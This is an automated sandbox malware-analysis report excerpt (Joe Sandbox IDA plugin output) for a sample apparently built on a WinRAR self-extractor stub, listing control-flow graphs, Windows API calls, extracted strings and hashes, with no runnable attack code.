                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz;
                                                                                                                                    • API String ID: 3049964643-3846469982
                                                                                                                                    • Opcode ID: b91dad493abe90bb28823c96b26063a638a079358b660e01631c348427fe6674
                                                                                                                                    • Instruction ID: 64f41ccc6fbc8af45d81688b1888e4b58f0504ab80edae51e2654ccd8e9cfd0b
                                                                                                                                    • Opcode Fuzzy Hash: b91dad493abe90bb28823c96b26063a638a079358b660e01631c348427fe6674
                                                                                                                                    • Instruction Fuzzy Hash: A361E771904245AFD333EB75DC4AF6B7BACEF49704F00442AF609962A1DB7C9944CB61

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 802 37a6c2-37a6df FindResourceW 803 37a6e5-37a6f6 SizeofResource 802->803 804 37a7db 802->804 803->804 806 37a6fc-37a70b LoadResource 803->806 805 37a7dd-37a7e1 804->805 806->804 807 37a711-37a71c LockResource 806->807 807->804 808 37a722-37a737 GlobalAlloc 807->808 809 37a7d3-37a7d9 808->809 810 37a73d-37a746 GlobalLock 808->810 809->805 811 37a7cc-37a7cd GlobalFree 810->811 812 37a74c-37a76a call 380320 810->812 811->809 816 37a7c5-37a7c6 GlobalUnlock 812->816 817 37a76c-37a78e call 37a626 812->817 816->811 817->816 822 37a790-37a798 817->822 823 37a7b3-37a7c1 822->823 824 37a79a-37a7ae GdipCreateHBITMAPFromBitmap 822->824 823->816 824->823 825 37a7b0 824->825 825->823
                                                                                                                                    APIs
                                                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0037B73D,00000066), ref: 0037A6D5
                                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A6EC
                                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A703
                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A712
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A72D
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0037A73E
                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0037A762
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0037A7C6
                                                                                                                                      • Part of subcall function 0037A626: GdipAlloc.GDIPLUS(00000010), ref: 0037A62C
                                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037A7A7
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0037A7CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                    • String ID: Fjun7$PNG
                                                                                                                                    • API String ID: 211097158-2849507817
                                                                                                                                    • Opcode ID: 781e09af95ab9c9bb2200b30ff3d2991ea16378a88f5b2282aa4279a9e29dee1
                                                                                                                                    • Instruction ID: 0ae87bb18b19c4718af96f0b6b67185bb12a14f5b5cb6c97da6bb15da91f8f5e
                                                                                                                                    • Opcode Fuzzy Hash: 781e09af95ab9c9bb2200b30ff3d2991ea16378a88f5b2282aa4279a9e29dee1
                                                                                                                                    • Instruction Fuzzy Hash: E331B5B5500742BFC726AF61DC48D1FBBBCEF84750F054519F90992620EB36DC44CA52

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1032 36a69b-36a6bf call 37ec50 1035 36a727-36a730 FindNextFileW 1032->1035 1036 36a6c1-36a6ce FindFirstFileW 1032->1036 1037 36a742-36a7ff call 370602 call 36c310 call 3715da * 3 1035->1037 1038 36a732-36a740 GetLastError 1035->1038 1036->1037 1039 36a6d0-36a6e2 call 36bb03 1036->1039 1043 36a804-36a811 1037->1043 1040 36a719-36a722 1038->1040 1046 36a6e4-36a6fc FindFirstFileW 1039->1046 1047 36a6fe-36a707 GetLastError 1039->1047 1040->1043 1046->1037 1046->1047 1049 36a717 1047->1049 1050 36a709-36a70c 1047->1050 1049->1040 1050->1049 1052 36a70e-36a711 1050->1052 1052->1049 1054 36a713-36a715 1052->1054 1054->1040
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6C4
                                                                                                                                      • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6F2
                                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6FE
                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A728
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0036A592,000000FF,?,?), ref: 0036A734
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 42610566-0
                                                                                                                                    • Opcode ID: e4dfd870ada6b8613ae315fe5ebdc05a7e372467edbc86006fba10ebd5d46aad
                                                                                                                                    • Instruction ID: 4105d1c71d124da5cfed7a17293c72a5ddd74ea7caa6c97a9b8c8056d6c19af5
                                                                                                                                    • Opcode Fuzzy Hash: e4dfd870ada6b8613ae315fe5ebdc05a7e372467edbc86006fba10ebd5d46aad
                                                                                                                                    • Instruction Fuzzy Hash: CE415276900515ABCB26DF68CC84AEAB7B8FB48350F148296F55EE3240D7346E94CF91
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00387DC4,00000000,0039C300,0000000C,00387F1B,00000000,00000002,00000000), ref: 00387E0F
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00387DC4,00000000,0039C300,0000000C,00387F1B,00000000,00000002,00000000), ref: 00387E16
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00387E28
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                    • Opcode ID: fc99b9f7c487db6621a876b2456ac515fb89d12440e9f4601282ba917814664e
                                                                                                                                    • Instruction ID: c11fc66639e3f387ff8ef6253576152f6d8561cf6c507d664bafeb477e361507
                                                                                                                                    • Opcode Fuzzy Hash: fc99b9f7c487db6621a876b2456ac515fb89d12440e9f4601282ba917814664e
                                                                                                                                    • Instruction Fuzzy Hash: 73E0BF71004244ABCF137F54DD0998A7F6AEB50341F114495F8198A232CB36EE51CB94
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 22c85a22a7302ab51e64d8cfa5ada4139d3a8c758a1443c3cf2a7c860c6721eb
                                                                                                                                    • Instruction ID: 88a6c44eb24b1c1c7872f82ed1df1354f7c8d14a71c94771b41b06c1fcab9899
                                                                                                                                    • Opcode Fuzzy Hash: 22c85a22a7302ab51e64d8cfa5ada4139d3a8c758a1443c3cf2a7c860c6721eb
                                                                                                                                    • Instruction Fuzzy Hash: 6F820C70904145AEDF17DF64C895BFABBB9BF09300F09C2BAD9499F14ADB315A84CB60
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0037B7E5
                                                                                                                                      • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                                                                      • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037B8D1
                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B8EF
                                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0037B902
                                                                                                                                    • TranslateMessage.USER32(?), ref: 0037B910
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0037B91A
                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0037B93D
                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0037B960
                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0037B983
                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037B99E
                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037B9B1
                                                                                                                                      • Part of subcall function 0037D453: _wcschr.LIBVCRUNTIME ref: 0037D45C
                                                                                                                                      • Part of subcall function 0037D453: _wcslen.LIBCMT ref: 0037D47D
                                                                                                                                    • SetFocus.USER32(00000000), ref: 0037B9B8
                                                                                                                                    • _swprintf.LIBCMT ref: 0037BA24
                                                                                                                                      • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                                                                      • Part of subcall function 0037D4D4: GetDlgItem.USER32(00000068,003BFCB8), ref: 0037D4E8
                                                                                                                                      • Part of subcall function 0037D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0037AF07,00000001,?,?,0037B7B9,0039506C,003BFCB8,003BFCB8,00001000,00000000,00000000), ref: 0037D510
                                                                                                                                      • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037D51B
                                                                                                                                      • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037D529
                                                                                                                                      • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D53F
                                                                                                                                      • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037D559
                                                                                                                                      • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D59D
                                                                                                                                      • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037D5AB
                                                                                                                                      • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D5BA
                                                                                                                                      • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D5E1
                                                                                                                                      • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003943F4), ref: 0037D5F0
                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0037BA68
                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0037BA90
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037BAAE
                                                                                                                                    • _swprintf.LIBCMT ref: 0037BAC2
                                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0037BAF4
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0037BB43
                                                                                                                                    • _swprintf.LIBCMT ref: 0037BB7C
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0037BBD0
                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0037BBEA
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0037BC47
                                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0037BC6F
                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0037BCB9
                                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0037BCE2
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0037BCEB
                                                                                                                                    • _swprintf.LIBCMT ref: 0037BD1E
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037BD7D
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,003935F4), ref: 0037BD94
                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0037BD9D
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0037BDAC
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0037BDBB
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037BE68
                                                                                                                                    • _wcslen.LIBCMT ref: 0037BEBE
                                                                                                                                    • _swprintf.LIBCMT ref: 0037BEE8
                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0037BF32
                                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0037BF4C
                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0037BF55
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0037BF6B
                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0037BF85
                                                                                                                                    • SetWindowTextW.USER32(00000000,003AA472), ref: 0037BFA7
                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0037C007
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037C01A
                                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0037C0BD
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0037C197
                                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0037C1D9
                                                                                                                                      • Part of subcall function 0037C73F: __EH_prolog.LIBCMT ref: 0037C744
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037C1FD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<7$STARTDLG$^7$__tmp_rar_sfx_access_check_%u$h7$winrarsfxmappingfile.tmp$Q9
                                                                                                                                    • API String ID: 3829768659-323668307
                                                                                                                                    • Opcode ID: b7bc009181bf3cbdeb418aeb12cfca1078101f4c1e114230ba899fa5a638246a
                                                                                                                                    • Instruction ID: 53649dc89d40add5bffb0df94f90567610c9d24bc83108ed043cb3b3b86269d6
                                                                                                                                    • Opcode Fuzzy Hash: b7bc009181bf3cbdeb418aeb12cfca1078101f4c1e114230ba899fa5a638246a
                                                                                                                                    • Instruction Fuzzy Hash: 4942D671944244BEEB33AB64DC4AFBE7B7CAB06704F04C159F649AA1D2CB785E44CB21

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 269 370863-370886 call 37ec50 GetModuleHandleW 272 3708e7-370b48 269->272 273 370888-37089f GetProcAddress 269->273 274 370c14-370c40 GetModuleFileNameW call 36c29a call 370602 272->274 275 370b4e-370b59 call 3875fb 272->275 276 3708a1-3708b7 273->276 277 3708b9-3708c9 GetProcAddress 273->277 291 370c42-370c4e call 36b146 274->291 275->274 286 370b5f-370b8d GetModuleFileNameW CreateFileW 275->286 276->277 280 3708e5 277->280 281 3708cb-3708e0 277->281 280->272 281->280 289 370b8f-370b9b SetFilePointer 286->289 290 370c08-370c0f CloseHandle 286->290 289->290 292 370b9d-370bb9 ReadFile 289->292 290->274 298 370c50-370c5b call 37081b 291->298 299 370c7d-370ca4 call 36c310 GetFileAttributesW 291->299 292->290 295 370bbb-370be0 292->295 297 370bfd-370c06 call 370371 295->297 297->290 306 370be2-370bfc call 37081b 297->306 298->299 308 370c5d-370c7b CompareStringW 298->308 309 370ca6-370caa 299->309 310 370cae 299->310 306->297 308->299 308->309 309->291 311 370cac 309->311 312 370cb0-370cb5 310->312 311->312 314 370cb7 312->314 315 370cec-370cee 312->315 316 370cb9-370ce0 call 36c310 GetFileAttributesW 314->316 317 370cf4-370d0b call 36c2e4 call 36b146 315->317 318 370dfb-370e05 315->318 323 370ce2-370ce6 316->323 324 370cea 316->324 328 370d73-370da6 call 364092 AllocConsole 317->328 329 370d0d-370d6e call 37081b * 2 call 36e617 call 364092 call 36e617 call 37a7e4 317->329 323->316 326 370ce8 323->326 324->315 326->315 334 370df3-370df5 ExitProcess 328->334 335 370da8-370ded GetCurrentProcessId AttachConsole call 383e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->335 329->334 335->334
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0037087C
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0037088E
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003708BF
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00370B69
                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00370B83
                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00370B93
                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<9,00000000), ref: 00370BB1
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00370C09
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00370C1E
                                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<9,?,00000000,?,00000800), ref: 00370C72
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<9,00000800,?,00000000,?,00000800), ref: 00370C9C
                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=9,00000800), ref: 00370CD8
                                                                                                                                      • Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                                                                      • Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                                                                    • _swprintf.LIBCMT ref: 00370D4A
                                                                                                                                    • _swprintf.LIBCMT ref: 00370D96
                                                                                                                                      • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                                                                    • AllocConsole.KERNEL32 ref: 00370D9E
                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00370DA8
                                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00370DAF
                                                                                                                                    • _wcslen.LIBCMT ref: 00370DC4
                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00370DD5
                                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00370DDC
                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00370DE7
                                                                                                                                    • FreeConsole.KERNEL32 ref: 00370DED
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00370DF5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                    • String ID: (=9$,<9$,@9$0?9$0A9$4B9$8>9$D=9$DXGIDebug.dll$H?9$H@9$HA9$P>9$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=9$`@9$d?9$dA9$dwmapi.dll$h=9$h>9$kernel32$uxtheme.dll$|<9$|?9$|@9$<9$>9$?9$@9$A9
                                                                                                                                    • API String ID: 1207345701-1829638217
                                                                                                                                    • Opcode ID: 409386703e4385607133f10098e7858fd52d9e3ff30057dd48582f30b1198311
                                                                                                                                    • Instruction ID: 4b3e199dabf1939c3b8ab164d5252d61f6f2933bb489d2f057b9f6564169ab09
                                                                                                                                    • Opcode Fuzzy Hash: 409386703e4385607133f10098e7858fd52d9e3ff30057dd48582f30b1198311
                                                                                                                                    • Instruction Fuzzy Hash: 95D180F5408385EBDB339F50C849A9FBBECBB85708F50491DF1899A250C7B58A49CB62

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
